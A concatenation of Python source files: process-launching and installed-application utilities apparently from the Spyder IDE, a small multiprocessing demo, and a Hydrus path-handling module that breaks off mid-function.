.
If 'executable' is not given in subprocess_kwargs, it will
be set to the value of the SHELL environment variable.
Note that stdin, stdout and stderr will be set by default
to PIPE unless specified in subprocess_kwargs.
:str cmdstr: The string run as a shell command.
:subprocess_kwargs: These will be passed to subprocess.Popen.
"""
if 'shell' in subprocess_kwargs and not subprocess_kwargs['shell']:
raise ProgramError(
'The "shell" kwarg may be omitted, but if '
'provided it must be True.')
else:
subprocess_kwargs['shell'] = True
# Don't pass SHELL to subprocess on Windows because it makes this
# fumction fail in Git Bash (where SHELL is declared; other Windows
# shells don't set it).
if not os.name == 'nt':
if 'executable' not in subprocess_kwargs:
subprocess_kwargs['executable'] = os.getenv('SHELL')
for stream in ['stdin', 'stdout', 'stderr']:
subprocess_kwargs.setdefault(stream, subprocess.PIPE)
subprocess_kwargs = alter_subprocess_kwargs_by_platform(
**subprocess_kwargs)
return subprocess.Popen(cmdstr, **subprocess_kwargs)
def run_program(program, args=None, **subprocess_kwargs):
"""
Run program in a separate process.
NOTE: returns the process object created by
`subprocess.Popen()`. This can be used with
`proc.communicate()` for example.
If 'shell' appears in the kwargs, it must be False,
otherwise ProgramError will be raised.
If only the program name is given and not the full path,
a lookup will be performed to find the program. If the
lookup fails, ProgramError will be raised.
Note that stdin, stdout and stderr will be set by default
to PIPE unless specified in subprocess_kwargs.
:str program: The name of the program to run.
:list args: The program arguments.
:subprocess_kwargs: These will be passed to subprocess.Popen.
"""
if 'shell' in subprocess_kwargs and subprocess_kwargs['shell']:
raise ProgramError(
"This function is only for non-shell programs, "
"use run_shell_command() instead.")
fullcmd = find_program(program)
if not fullcmd:
raise ProgramError("Program %s was not found" % program)
# As per subprocess, we make a complete list of prog+args
fullcmd = get_full_command_for_program(fullcmd) + (args or [])
for stream in ['stdin', 'stdout', 'stderr']:
subprocess_kwargs.setdefault(stream, subprocess.PIPE)
subprocess_kwargs = alter_subprocess_kwargs_by_platform(
**subprocess_kwargs)
return subprocess.Popen(fullcmd, **subprocess_kwargs)
def parse_linux_desktop_entry(fpath):
"""Load data from desktop entry with xdg specification."""
from xdg.DesktopEntry import DesktopEntry
try:
entry = DesktopEntry(fpath)
entry_data = {}
entry_data['name'] = entry.getName()
entry_data['icon_path'] = entry.getIcon()
entry_data['exec'] = entry.getExec()
entry_data['type'] = entry.getType()
entry_data['hidden'] = entry.getHidden()
entry_data['fpath'] = fpath
except Exception:
entry_data = {
'name': '',
'icon_path': '',
'hidden': '',
'exec': '',
'type': '',
'fpath': fpath
}
return entry_data
def _get_mac_application_icon_path(app_bundle_path):
"""Parse mac application bundle and return path for *.icns file."""
import plistlib
contents_path = info_path = os.path.join(app_bundle_path, 'Contents')
info_path = os.path.join(contents_path, 'Info.plist')
pl = {}
if os.path.isfile(info_path):
try:
# readPlist is deprecated but needed for py27 compat
pl = plistlib.readPlist(info_path)
except Exception:
pass
icon_file = pl.get('CFBundleIconFile')
icon_path = None
if icon_file:
icon_path = os.path.join(contents_path, 'Resources', icon_file)
# Some app bundles seem to list the icon name without extension
if not icon_path.endswith('.icns'):
icon_path = icon_path + '.icns'
if not os.path.isfile(icon_path):
icon_path = None
return icon_path
def get_username():
"""Return current session username."""
if os.name == 'nt':
username = os.getlogin()
else:
import pwd
username = pwd.getpwuid(os.getuid())[0]
return username
def _get_win_reg_info(key_path, hive, flag, subkeys):
"""
See: https://stackoverflow.com/q/53132434
"""
import winreg
reg = winreg.ConnectRegistry(None, hive)
software_list = []
try:
key = winreg.OpenKey(reg, key_path, 0, winreg.KEY_READ | flag)
count_subkey = winreg.QueryInfoKey(key)[0]
for index in range(count_subkey):
software = {}
try:
subkey_name = winreg.EnumKey(key, index)
if not (subkey_name.startswith('{')
and subkey_name.endswith('}')):
software['key'] = subkey_name
subkey = winreg.OpenKey(key, subkey_name)
for property in subkeys:
try:
value = winreg.QueryValueEx(subkey, property)[0]
software[property] = value
except EnvironmentError:
software[property] = ''
software_list.append(software)
except EnvironmentError:
continue
except Exception:
pass
return software_list
def _clean_win_application_path(path):
"""Normalize windows path and remove extra quotes."""
path = path.replace('\\', '/').lower()
# Check for quotes at start and end
if path[0] == '"' and path[-1] == '"':
path = literal_eval(path)
return path
def _get_win_applications():
"""Return all system installed windows applications."""
import winreg
# See:
# https://docs.microsoft.com/en-us/windows/desktop/shell/app-registration
key_path = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths'
# Hive and flags
hfs = [
(winreg.HKEY_LOCAL_MACHINE, winreg.KEY_WOW64_32KEY),
(winreg.HKEY_LOCAL_MACHINE, winreg.KEY_WOW64_64KEY),
(winreg.HKEY_CURRENT_USER, 0),
]
subkeys = [None]
sort_key = 'key'
app_paths = {}
_apps = [_get_win_reg_info(key_path, hf[0], hf[1], subkeys) for hf in hfs]
software_list = itertools.chain(*_apps)
for software in sorted(software_list, key=lambda x: x[sort_key]):
if software[None]:
key = software['key'].capitalize().replace('.exe', '')
expanded_fpath = os.path.expandvars(software[None])
expanded_fpath = _clean_win_application_path(expanded_fpath)
app_paths[key] = expanded_fpath
# See:
# https://www.blog.pythonlibrary.org/2010/03/03/finding-installed-software-using-python/
# https://stackoverflow.com/q/53132434
key_path = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall'
subkeys = ['DisplayName', 'InstallLocation', 'DisplayIcon']
sort_key = 'DisplayName'
apps = {}
_apps = [_get_win_reg_info(key_path, hf[0], hf[1], subkeys) for hf in hfs]
software_list = itertools.chain(*_apps)
for software in sorted(software_list, key=lambda x: x[sort_key]):
location = software['InstallLocation']
name = software['DisplayName']
icon = software['DisplayIcon']
key = software['key']
if name and icon:
icon = icon.replace('"', '')
icon = icon.split(',')[0]
if location == '' and icon:
location = os.path.dirname(icon)
if not os.path.isfile(icon):
icon = ''
if location and os.path.isdir(location):
files = [f for f in os.listdir(location)
if os.path.isfile(os.path.join(location, f))]
if files:
for fname in files:
fn_low = fname.lower()
valid_file = fn_low.endswith(('.exe', '.com', '.bat'))
if valid_file and not fn_low.startswith('unins'):
fpath = os.path.join(location, fname)
expanded_fpath = os.path.expandvars(fpath)
expanded_fpath = _clean_win_application_path(
expanded_fpath)
apps[name + ' (' + fname + ')'] = expanded_fpath
# Join data
values = list(zip(*apps.values()))[-1]
for name, fpath in app_paths.items():
if fpath not in values:
apps[name] = fpath
return apps
def _get_linux_applications():
"""Return all system installed linux applications."""
# See:
# https://standards.freedesktop.org/desktop-entry-spec/desktop-entry-spec-latest.html
# https://askubuntu.com/q/433609
apps = {}
desktop_app_paths = [
'/usr/share/**/*.desktop',
'~/.local/share/**/*.desktop',
]
all_entries_data = []
for path in desktop_app_paths:
fpaths = glob.glob(path)
for fpath in fpaths:
entry_data = parse_linux_desktop_entry(fpath)
all_entries_data.append(entry_data)
for entry_data in sorted(all_entries_data, key=lambda x: x['name']):
if not entry_data['hidden'] and entry_data['type'] == 'Application':
apps[entry_data['name']] = entry_data['fpath']
return apps
def _get_mac_applications():
"""Return all system installed osx applications."""
apps = {}
app_folders = [
'/**/*.app',
'/Users/{}/**/*.app'.format(get_username())
]
fpaths = []
for path in app_folders:
fpaths += glob.glob(path)
for fpath in fpaths:
if os.path.isdir(fpath):
name = os.path.basename(fpath).split('.app')[0]
apps[name] = fpath
return apps
def get_application_icon(fpath):
"""Return application icon or default icon if not found."""
from qtpy.QtGui import QIcon
from spyder.utils.icon_manager import ima
if os.path.isfile(fpath) or os.path.isdir(fpath):
icon = ima.icon('no_match')
if sys.platform == 'darwin':
icon_path = _get_mac_application_icon_path(fpath)
if icon_path and os.path.isfile(icon_path):
icon = QIcon(icon_path)
elif os.name == 'nt':
pass
else:
entry_data = parse_linux_desktop_entry(fpath)
icon_path = entry_data['icon_path']
if icon_path:
if os.path.isfile(icon_path):
icon = QIcon(icon_path)
else:
icon = QIcon.fromTheme(icon_path)
else:
icon = ima.icon('help')
return icon
def get_installed_applications():
"""
Return all system installed applications.
The return value is a list of tuples where the first item is the icon path
and the second item is the program executable path.
"""
apps = {}
if sys.platform == 'darwin':
apps = _get_mac_applications()
elif os.name == 'nt':
apps = _get_win_applications()
else:
apps = _get_linux_applications()
if sys.platform == 'darwin':
apps = {key: val for (key, val) in apps.items() if osp.isdir(val)}
else:
apps = {key: val for (key, val) in apps.items() if osp.isfile(val)}
return apps
def open_files_with_application(app_path, fnames):
"""
Generalized method for opening files with a specific application.
Returns a dictionary of the command used and the return code.
A code equal to 0 means the application executed successfully.
"""
return_codes = {}
if os.name == 'nt':
fnames = [fname.replace('\\', '/') for fname in fnames]
if sys.platform == 'darwin':
if not (app_path.endswith('.app') and os.path.isdir(app_path)):
raise ValueError('`app_path` must point to a valid OSX '
'application!')
cmd = ['open', '-a', app_path] + fnames
try:
return_code = subprocess.call(cmd)
except Exception:
return_code = 1
return_codes[' '.join(cmd)] = return_code
elif os.name == 'nt':
if not (app_path.endswith(('.exe', '.bat', '.com', '.cmd'))
and os.path.isfile(app_path)):
raise ValueError('`app_path` must point to a valid Windows '
'executable!')
cmd = [app_path] + fnames
try:
return_code = subprocess.call(cmd)
except OSError:
return_code = 1
return_codes[' '.join(cmd)] = return_code
else:
if not (app_path.endswith('.desktop') and os.path.isfile(app_path)):
raise ValueError('`app_path` must point to a valid Linux '
'application!')
entry = parse_linux_desktop_entry(app_path)
app_path = entry['exec']
multi = []
extra = []
if len(fnames) == 1:
fname = fnames[0]
if '%u' in app_path:
cmd = app_path.replace('%u', fname)
elif '%f' in app_path:
cmd = app_path.replace('%f', fname)
elif '%U' in app_path:
cmd = app_path.replace('%U', fname)
elif '%F' in app_path:
cmd = app_path.replace('%F', fname)
else:
cmd = app_path
extra = fnames
elif len(fnames) > 1:
if '%U' in app_path:
cmd = app_path.replace('%U', ' '.join(fnames))
elif '%F' in app_path:
cmd = app_path.replace('%F', ' '.join(fnames))
if '%u' in app_path:
for fname in fnames:
multi.append(app_path.replace('%u', fname))
elif '%f' in app_path:
for fname in fnames:
multi.append(app_path.replace('%f', fname))
else:
cmd = app_path
extra = fnames
if multi:
for cmd in multi:
try:
return_code = subprocess.call([cmd], shell=True)
except Exception:
return_code = 1
return_codes[cmd] = return_code
else:
try:
return_code = subprocess.call([cmd] + extra, shell=True)
except Exception:
return_code = 1
return_codes[cmd] = return_code
return return_codes
def python_script_exists(package=None, module=None):
"""
Return absolute path if Python script exists (otherwise, return None)
package=None -> module is in sys.path (standard library modules)
"""
assert module is not None
if package is None:
spec = importlib.util.find_spec(module)
if spec:
path = spec.origin
else:
path = None
else:
spec = importlib.util.find_spec(package)
if spec:
path = osp.join(spec.origin, module)+'.py'
else:
path = None
if path:
if not osp.isfile(path):
path += 'w'
if osp.isfile(path):
return path
def run_python_script(package=None, module=None, args=[], p_args=[]):
"""
Run Python script in a separate process
package=None -> module is in sys.path (standard library modules)
"""
assert module is not None
assert isinstance(args, (tuple, list)) and isinstance(p_args, (tuple, list))
path = python_script_exists(package, module)
run_program(sys.executable, p_args + [path] + args)
def shell_split(text):
"""
Split the string `text` using shell-like syntax
This avoids breaking single/double-quoted strings (e.g. containing
strings with spaces). This function is almost equivalent to the shlex.split
function (see standard library `shlex`) except that it is supporting
unicode strings (shlex does not support unicode until Python 2.7.3).
"""
assert is_text_string(text) # in case a QString is passed...
pattern = r'(\s+|(?<!\\)".*?(?<!\\)"|(?<!\\)\'.*?(?<!\\)\')'
out = []
for token in re.split(pattern, text):
if token.strip():
out.append(token.strip('"').strip("'"))
return out
def get_python_args(fname, python_args, interact, debug, end_args):
"""Construct Python interpreter arguments"""
p_args = []
if python_args is not None:
p_args += python_args.split()
if interact:
p_args.append('-i')
if debug:
p_args.extend(['-m', 'pdb'])
if fname is not None:
if os.name == 'nt' and debug:
# When calling pdb on Windows, one has to replace backslashes by
# slashes to avoid confusion with escape characters (otherwise,
# for example, '\t' will be interpreted as a tabulation):
p_args.append(osp.normpath(fname).replace(os.sep, '/'))
else:
p_args.append(fname)
if end_args:
p_args.extend(shell_split(end_args))
return p_args
def run_python_script_in_terminal(fname, wdir, args, interact,
debug, python_args, executable=None):
"""
Run Python script in an external system terminal.
:str wdir: working directory, may be empty.
"""
if executable is None:
executable = get_python_executable()
# If fname or python_exe contains spaces, it can't be ran on Windows, so we
# have to enclose them in quotes. Also wdir can come with / as os.sep, so
# we need to take care of it.
if os.name == 'nt':
fname = '"' + fname + '"'
wdir = wdir.replace('/', '\\')
executable = '"' + executable + '"'
p_args = [executable]
p_args += get_python_args(fname, python_args, interact, debug, args)
if os.name == 'nt':
cmd = 'start cmd.exe /K "'
if wdir:
cmd += 'cd ' + wdir + ' && '
cmd += ' '.join(p_args) + '"' + ' ^&^& exit'
# Command line and cwd have to be converted to the filesystem
# encoding before passing them to subprocess, but only for
# Python 2.
# See https://bugs.python.org/issue1759845#msg74142 and
# spyder-ide/spyder#1856.
if PY2:
cmd = encoding.to_fs_from_unicode(cmd)
wdir = encoding.to_fs_from_unicode(wdir)
try:
if wdir:
run_shell_command(cmd, cwd=wdir)
else:
run_shell_command(cmd)
except WindowsError:
from qtpy.QtWidgets import QMessageBox
from spyder.config.base import _
QMessageBox.critical(None, _('Run'),
_("It was not possible to run this file in "
"an external terminal"),
QMessageBox.Ok)
elif sys.platform.startswith('linux'):
programs = [{'cmd': 'gnome-terminal',
'wdir-option': '--working-directory',
'execute-option': '-x'},
{'cmd': 'konsole',
'wdir-option': '--workdir',
'execute-option': '-e'},
{'cmd': 'xfce4-terminal',
'wdir-option': '--working-directory',
'execute-option': '-x'},
{'cmd': 'xterm',
'wdir-option': None,
'execute-option': '-e'},]
for program in programs:
if is_program_installed(program['cmd']):
arglist = []
if program['wdir-option'] and wdir:
arglist += [program['wdir-option'], wdir]
arglist.append(program['execute-option'])
arglist += p_args
if wdir:
run_program(program['cmd'], arglist, cwd=wdir)
else:
run_program(program['cmd'], arglist)
return
elif sys.platform == 'darwin':
f = tempfile.NamedTemporaryFile('wt', prefix='run_spyder_',
suffix='.sh', dir=get_temp_dir(),
delete=False)
if wdir:
f.write('cd {}\n'.format(wdir))
f.write(' '.join(p_args))
f.close()
os.chmod(f.name, 0o777)
def run_terminal_thread():
proc = run_shell_command('open -a Terminal.app ' + f.name)
# Prevent race condition
time.sleep(3)
proc.wait()
os.remove(f.name)
thread = threading.Thread(target=run_terminal_thread)
thread.start()
else:
raise NotImplementedError
def check_version(actver, version, cmp_op):
"""
Check version string of an active module against a required version.
If dev/prerelease tags result in TypeError for string-number comparison,
it is assumed that the dependency is satisfied.
Users on dev branches are responsible for keeping their own packages up to
date.
Copyright (C) 2013 The IPython Development Team
Distributed under the terms of the BSD License.
"""
if isinstance(actver, tuple):
actver = '.'.join([str(i) for i in actver])
try:
if cmp_op == '>':
return parse_version(actver) > parse_version(version)
elif cmp_op == '>=':
return parse_version(actver) >= parse_version(version)
elif cmp_op == '=':
return parse_version(actver) == parse_version(version)
elif cmp_op == '<':
return parse_version(actver) < parse_version(version)
elif cmp_op == '<=':
return parse_version(actver) <= parse_version(version)
else:
return False
except TypeError:
return True
def get_module_version(module_name):
"""Return module version or None if version can't be retrieved."""
mod = __import__(module_name)
ver = getattr(mod, '__version__', getattr(mod, 'VERSION', None))
if not ver:
ver = get_package_version(module_name)
return ver
def get_package_version(package_name):
"""Return package version or None if version can't be retrieved."""
# When support for Python 3.7 and below is dropped, this can be replaced
# with the built-in importlib.metadata.version
try:
ver = pkg_resources.get_distribution(package_name).version
return ver
except pkg_resources.DistributionNotFound:
return None
def is_module_installed(module_name, version=None, interpreter=None):
"""
Return True if module ``module_name`` is installed
If ``version`` is not None, checks that the module's installed version is
consistent with ``version``. The module must have an attribute named
'__version__' or 'VERSION'.
version may start with =, >=, > or < to specify the exact requirement ;
multiple conditions may be separated by ';' (e.g. '>=0.13;<1.0')
If ``interpreter`` is not None, checks if a module is installed with a
given ``version`` in the ``interpreter``'s environment. Otherwise checks
in Spyder's environment.
"""
if interpreter is not None:
if is_python_interpreter(interpreter):
cmd = dedent("""
try:
import {} as mod
except Exception:
print('No Module') # spyder: test-skip
print(getattr(mod, '__version__', getattr(mod, 'VERSION', None))) # spyder: test-skip
""").format(module_name)
try:
# use clean environment
proc = run_program(interpreter, ['-c', cmd], env={})
stdout, stderr = proc.communicate()
stdout = stdout.decode().strip()
except Exception:
return False
if 'No Module' in stdout:
return False
elif stdout != 'None':
# the module is installed and it has a version attribute
module_version = stdout
else:
module_version = None
else:
# Try to not take a wrong decision if interpreter check fails
return True
else:
# interpreter is None, just get module version in Spyder environment
try:
module_version = get_module_version(module_name)
except Exception:
# Module is not installed
return False
# This can happen if a package was not uninstalled correctly. For
# instance, if it's __pycache__ main directory is left behind.
try:
mod = __import__(module_name)
if not getattr(mod, '__file__', None):
return False
except Exception:
pass
if version is None:
return True
else:
if ';' in version:
versions = version.split(';')
else:
versions = [version]
output = True
for _ver in versions:
match = re.search(r'[0-9]', _ver)
assert match is not None, "Invalid version number"
symb = _ver[:match.start()]
if not symb:
symb = '='
assert symb in ('>=', '>', '=', '<', '<='),\
"Invalid version condition '%s'" % symb
ver = _ver[match.start():]
output = output and check_version(module_version, ver, symb)
return output
def is_python_interpreter_valid_name(filename):
"""Check that the python interpreter file has a valid name."""
pattern = r'.*python(\d\.?\d*)?(w)?(.exe)?$'
if re.match(pattern, filename, flags=re.I) is None:
return False
else:
return True
def is_python_interpreter(filename):
"""Evaluate whether a file is a python interpreter or not."""
real_filename = os.path.realpath(filename) # To follow symlink if existent
if (not osp.isfile(real_filename) or
not is_python_interpreter_valid_name(filename)):
return False
elif is_pythonw(filename):
if os.name == 'nt':
# pythonw is a binary on Windows
if not encoding.is_text_file(real_filename):
return True
else:
return False
elif sys.platform == 'darwin':
# pythonw is a text file in Anaconda but a binary in
# the system
if is_anaconda() and encoding.is_text_file(real_filename):
return True
elif not encoding.is_text_file(real_filename):
return True
else:
return False
else:
# There's no pythonw in other systems
return False
elif encoding.is_text_file(real_filename):
# At this point we can't have a text file
return False
else:
return check_python_help(filename)
def is_pythonw(filename):
"""Check that the python interpreter has 'pythonw'."""
pattern = r'.*python(\d\.?\d*)?w(.exe)?$'
if re.match(pattern, filename, flags=re.I) is None:
return False
else:
return True
def check_python_help(filename):
"""Check that the python interpreter can compile and provide the zen."""
try:
proc = run_program(filename, ['-c', 'import this'], env={})
stdout, _ = proc.communicate()
stdout = to_text_string(stdout)
valid_lines = [
'Beautiful is better than ugly.',
'Explicit is better than implicit.',
'Simple is better than complex.',
'Complex is better than complicated.',
]
if all(line in stdout for line in valid_lines):
return True
else:
return False
except Exception:
return False
def is_spyder_process(pid):
"""
Test whether given PID belongs to a Spyder process.
This is checked by testing the first three command line arguments. This
function returns a bool. If there is no process with this PID or its
command line cannot be accessed (perhaps because the process is owned by
another user), then the function returns False.
"""
try:
p = psutil.Process(int(pid))
# Valid names for main script
names = set(['spyder', 'spyder3', 'spyder.exe', 'spyder3.exe',
'bootstrap.py', 'spyder-script.py', 'Spyder.launch.pyw'])
if running_under_pytest():
names.add('runtests.py')
# Check the first three command line arguments
arguments = set(os.path.basename(arg) for arg in p.cmdline()[:3])
conditions = [names & arguments]
return any(conditions)
except (psutil.NoSuchProcess, psutil.AccessDenied):
return False
def get_interpreter_info(path):
"""Return version information of the selected Python interpreter."""
try:
out, __ = run_program(path, ['-V']).communicate()
out = out.decode()
except Exception:
out = ''
return out.strip()
def find_git():
"""Find git executable in the system."""
if sys.platform == 'darwin':
proc = subprocess.run(
osp.join(HERE, "check-git.sh"), capture_output=True)
if proc.returncode != 0:
return None
return find_program('git')
else:
return find_program('git')
|
processing1.py
|
#! /usr/bin/env python3
# -*-coding:utf-8 -*-
# @Time : 2019/06/16 18:52:49
# @Author : che
# @Email : ch1huizong@gmail.com
from multiprocessing import Process, Queue
import time
def f(q):
x = q.get()
print("Process number %s, sleeps for %s seconds" % (x, x))
time.sleep(x) # 若time.sleep(10-x)
print("Process number %s finished" % x)
q = Queue()
for i in range(10):
q.put(i)
i = Process(target=f, args=[q])
i.start()
print("main process joins on queue")
#i.join() # 其实可以没有
print("Main Program finished")
|
HydrusPaths.py
|
import gc
from . import HydrusConstants as HC
from . import HydrusData
from . import HydrusExceptions
from . import HydrusGlobals as HG
from . import HydrusThreading
import os
import psutil
import re
import send2trash
import shlex
import shutil
import stat
import subprocess
import sys
import tempfile
import threading
import traceback
TEMP_PATH_LOCK = threading.Lock()
IN_USE_TEMP_PATHS = set()
def AddBaseDirToEnvPath():
# this is a thing to get mpv working, loading the dll/so from the base dir using ctypes
if 'PATH' in os.environ:
os.environ[ 'PATH' ] = HC.BASE_DIR + os.pathsep + os.environ[ 'PATH' ]
def AppendPathUntilNoConflicts( path ):
( path_absent_ext, ext ) = os.path.splitext( path )
good_path_absent_ext = path_absent_ext
i = 0
while os.path.exists( good_path_absent_ext + ext ):
good_path_absent_ext = path_absent_ext + '_' + str( i )
i += 1
return good_path_absent_ext + ext
def CleanUpTempPath( os_file_handle, temp_path ):
try:
os.close( os_file_handle )
except OSError:
gc.collect()
try:
os.close( os_file_handle )
except OSError:
HydrusData.Print( 'Could not close the temporary file ' + temp_path )
return
try:
os.remove( temp_path )
except OSError:
with TEMP_PATH_LOCK:
IN_USE_TEMP_PATHS.add( ( HydrusData.GetNow(), temp_path ) )
def CleanUpOldTempPaths():
with TEMP_PATH_LOCK:
data = list( IN_USE_TEMP_PATHS )
for row in data:
( time_failed, temp_path ) = row
if HydrusData.TimeHasPassed( time_failed + 60 ):
try:
os.remove( temp_path )
IN_USE_TEMP_PATHS.discard( row )
except OSError:
if HydrusData.TimeHasPassed( time_failed + 600 ):
IN_USE_TEMP_PATHS.discard( row )
def ConvertAbsPathToPortablePath( abs_path, base_dir_override = None ):
try:
if base_dir_override is None:
base_dir = HG.controller.GetDBDir()
else:
base_dir = base_dir_override
portable_path = os.path.relpath( abs_path, base_dir )
if portable_path.startswith( '..' ):
portable_path = abs_path
except:
portable_path = abs_path
if HC.PLATFORM_WINDOWS:
portable_path = portable_path.replace( '\\', '/' ) # store seps as /, to maintain multiplatform uniformity
return portable_path
def ConvertPortablePathToAbsPath( portable_path, base_dir_override = None ):
portable_path = os.path.normpath( portable_path ) # collapses .. stuff and converts / to \\ for windows only
if os.path.isabs( portable_path ):
abs_path = portable_path
else:
if base_dir_override is None:
base_dir = HG.controller.GetDBDir()
else:
base_dir = base_dir_override
abs_path = os.path.normpath( os.path.join( base_dir, portable_path ) )
if not HC.PLATFORM_WINDOWS and not os.path.exists( abs_path ):
abs_path = abs_path.replace( '\\', '/' )
return abs_path
def CopyAndMergeTree( source, dest ):
pauser = HydrusData.BigJobPauser()
MakeSureDirectoryExists( dest )
num_errors = 0
for ( root, dirnames, filenames ) in os.walk( source ):
dest_root = root.replace( source, dest )
for dirname in dirnames:
pauser.Pause()
source_path = os.path.join( root, dirname )
dest_path = os.path.join( dest_root, dirname )
MakeSureDirectoryExists( dest_path )
shutil.copystat( source_path, dest_path )
for filename in filenames:
if num_errors > 5:
raise Exception( 'Too many errors, directory copy abandoned.' )
pauser.Pause()
source_path = os.path.join( root, filename )
dest_path = os.path.join( dest_root, filename )
ok = MirrorFile( source_path, dest_path )
if not ok:
num_errors += 1
def CopyFileLikeToFileLike( f_source, f_dest ):
for block in ReadFileLikeAsBlocks( f_source ): f_dest.write( block )
def DeletePath( path ):
if HG.file_report_mode:
HydrusData.ShowText( 'Deleting {}'.format( path ) )
HydrusData.ShowText( ''.join( traceback.format_stack() ) )
if os.path.exists( path ):
MakeFileWritable( path )
try:
if os.path.isdir( path ):
shutil.rmtree( path )
else:
os.remove( path )
except Exception as e:
if 'Error 32' in str( e ):
# file in use by another process
HydrusData.DebugPrint( 'Trying to delete ' + path + ' failed because it was in use by another process.' )
else:
HydrusData.ShowText( 'Trying to delete ' + path + ' caused the following error:' )
HydrusData.ShowException( e )
def DirectoryIsWritable( path ):
if not os.path.exists( path ):
return False
try:
t = tempfile.TemporaryFile( dir = path )
t.close()
return True
except:
return False
def FilterFreePaths( paths ):
free_paths = []
for path in paths:
HydrusThreading.CheckIfThreadShuttingDown()
if PathIsFree( path ):
free_paths.append( path )
return free_paths
def GetCurrentTempDir():
return tempfile.gettempdir()
def GetDefaultLaunchPath():
if HC.PLATFORM_WINDOWS:
return 'windows is called directly'
elif HC.PLATFORM_MACOS:
return 'open "%path%"'
elif HC.PLATFORM_LINUX:
return 'xdg-open "%path%"'
def GetDevice( path ):
path = path.lower()
try:
partition_infos = psutil.disk_partitions( all = True )
def sort_descending_mountpoint( partition_info ): # i.e. put '/home' before '/'
return - len( partition_info.mountpoint )
partition_infos.sort( key = sort_descending_mountpoint )
for partition_info in partition_infos:
if path.startswith( partition_info.mountpoint.lower() ):
return partition_info.device
except UnicodeDecodeError: # wew lad psutil on some russian lad's fun filesystem
return None
return None
def GetFreeSpace( path ):
disk_usage = psutil.disk_usage( path )
return disk_usage.free
def GetTempDir( dir = None ):
return tempfile.mkdtemp( prefix = 'hydrus', dir = dir )
def SetEnvTempDir( path ):
if os.path.exists( path ) and not os.path.isdir( path ):
raise Exception( 'The given temp directory, "{}", does not seem to be a directory!'.format( path ) )
try:
MakeSureDirectoryExists( path )
except Exception as e:
raise Exception( 'Could not create the temp dir: {}'.format( e ) )
if not DirectoryIsWritable( path ):
raise Exception( 'The given temp directory, "{}", does not seem to be writable-to!'.format( path ) )
for tmp_name in ( 'TMPDIR', 'TEMP', 'TMP' ):
if tmp_name in os.environ:
os.environ[ tmp_name ] = path
tempfile.tempdir = path
def GetTempPath( suffix = '', dir = None ):
return tempfile.mkstemp( suffix = suffix, prefix = 'hydrus', dir = dir )
def HasSpaceForDBTransaction( db_dir, num_bytes ):
if HG.no_db_temp_files:
space_needed = int( num_bytes * 1.1 )
approx_available_memory = psutil.virtual_memory().available * 4 / 5
if approx_available_memory < num_bytes:
return ( False, 'I believe you need about ' + HydrusData.ToHumanBytes( space_needed ) + ' available memory, since you are running in no_db_temp_files mode, but you only seem to have ' + HydrusData.ToHumanBytes( approx_available_memory ) + '.' )
db_disk_free_space = GetFreeSpace( db_dir )
if db_disk_free_space < space_needed:
return ( False, 'I believe you need about ' + HydrusData.ToHumanBytes( space_needed ) + ' on your db\'s partition, but you only seem to have ' + HydrusData.ToHumanBytes( db_disk_free_space ) + '.' )
else:
temp_dir = tempfile.gettempdir()
temp_disk_free_space = GetFreeSpace( temp_dir )
temp_and_db_on_same_device = GetDevice( temp_dir ) == GetDevice( db_dir )
if temp_and_db_on_same_device:
space_needed = int( num_bytes * 2.2 )
if temp_disk_free_space < space_needed:
return ( False, 'I believe you need about ' + HydrusData.ToHumanBytes( space_needed ) + ' on your db\'s partition, which I think also holds your temporary path, but you only seem to have ' + HydrusData.ToHumanBytes( temp_disk_free_space ) + '.' )
else:
space_needed = int( num_bytes * 1.1 )
if temp_disk_free_space < space_needed:
return ( False, 'I believe you need about ' + HydrusData.ToHumanBytes( space_needed ) + ' on your temporary path\'s partition, which I think is ' + temp_dir + ', but you only seem to have ' + HydrusData.ToHumanBytes( temp_disk_free_space ) + '.' )
db_disk_free_space = GetFreeSpace( db_dir )
if db_disk_free_space < space_needed:
return ( False, 'I believe you need about ' + HydrusData.ToHumanBytes( space_needed ) + ' on your db\'s partition, but you only seem to have ' + HydrusData.ToHumanBytes( db_disk_free_space ) + '.' )
return ( True, 'You seem to have enough space!' )
def LaunchDirectory( path ):
def do_it():
if HC.PLATFORM_WINDOWS:
os.startfile( path )
else:
if HC.PLATFORM_MACOS:
cmd = [ 'open', path ]
elif HC.PLATFORM_LINUX:
cmd = [ 'xdg-open', path ]
# setsid call un-childs this new process
sbp_kwargs = HydrusData.GetSubprocessKWArgs()
process = subprocess.Popen( cmd, preexec_fn = os.setsid, **sbp_kwargs )
process.communicate()
thread = threading.Thread( target = do_it )
thread.daemon = True
thread.start()
def LaunchFile( path, launch_path = None ):
def do_it( launch_path ):
if HC.PLATFORM_WINDOWS and launch_path is None:
os.startfile( path )
else:
if launch_path is None:
launch_path = GetDefaultLaunchPath()
complete_launch_path = launch_path.replace( '%path%', path )
hide_terminal = False
if HC.PLATFORM_WINDOWS:
cmd = complete_launch_path
preexec_fn = None
else:
cmd = shlex.split( complete_launch_path )
# un-childs this new process
preexec_fn = os.setsid
if HG.subprocess_report_mode:
message = 'Attempting to launch ' + path + ' using command ' + repr( cmd ) + '.'
HydrusData.ShowText( message )
try:
sbp_kwargs = HydrusData.GetSubprocessKWArgs( hide_terminal = hide_terminal, text = True )
process = subprocess.Popen( cmd, preexec_fn = preexec_fn, stdin = subprocess.PIPE, stdout = subprocess.PIPE, stderr = subprocess.PIPE, **sbp_kwargs )
( stdout, stderr ) = process.communicate()
if HG.subprocess_report_mode:
if stdout is None and stderr is None:
HydrusData.ShowText( 'No stdout or stderr came back.' )
if stdout is not None:
HydrusData.ShowText( 'stdout: ' + repr( stdout ) )
if stderr is not None:
HydrusData.ShowText( 'stderr: ' + repr( stderr ) )
except Exception as e:
HydrusData.ShowText( 'Could not launch a file! Command used was:' + os.linesep + str( cmd ) )
HydrusData.ShowException( e )
thread = threading.Thread( target = do_it, args = ( launch_path, ) )
thread.daemon = True
thread.start()
def MakeSureDirectoryExists( path ):
os.makedirs( path, exist_ok = True )
def MakeFileWritable( path ):
if not os.path.exists( path ):
return
try:
stat_result = os.stat( path )
current_bits = stat_result.st_mode
if HC.PLATFORM_WINDOWS:
# this is actually the same value as S_IWUSR, but let's not try to second guess ourselves
desired_bits = stat.S_IREAD | stat.S_IWRITE
else:
# guarantee 644 for regular files m8
desired_bits = stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IROTH
if not ( desired_bits & current_bits ) == desired_bits:
os.chmod( path, current_bits | desired_bits )
except Exception as e:
